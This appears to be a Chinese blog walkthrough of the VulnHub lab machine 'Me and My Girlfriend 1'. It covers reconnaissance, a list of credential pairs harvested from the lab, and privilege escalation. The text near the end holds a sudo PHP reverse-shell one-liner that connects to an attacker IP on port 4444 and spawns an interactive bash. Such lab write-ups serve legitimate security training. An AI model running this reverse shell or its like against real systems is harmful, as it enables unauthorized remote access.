friend靶机
仅供个人娱乐
靶机信息
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
一、主机探测
![](https://upload-images.jianshu.io/upload_images/4664072-8a1a7885d9b12f6a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-4b49188db943fd4a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-92d91d6265cecced.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b827b6818ee50149.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
访问一下web站点,提示只能从本地登录,否则会被当作hacker拦截。
![](https://upload-images.jianshu.io/upload_images/4664072-d762d844bbf5d982.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞查找和利用
![](https://upload-images.jianshu.io/upload_images/4664072-a788b9f353d191c3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9e9b04d819caf922.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d65d4a1fcc9201e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
注册账户登录 信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-482aecb2e64774a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7b32c942c04c8115.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest
切换账户登录 没有信息
注入没有 信息
![](https://upload-images.jianshu.io/upload_images/4664072-c8a09542741f198c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b83140e69a811dc9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-0c18f29b79b12d83.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
反弹php
sudo /usr/bin/php -r '$sock=fsockopen("192.168.174.128",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
![](https://upload-images.jianshu.io/upload_images/4664072-a519c91ebb3e5b53.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)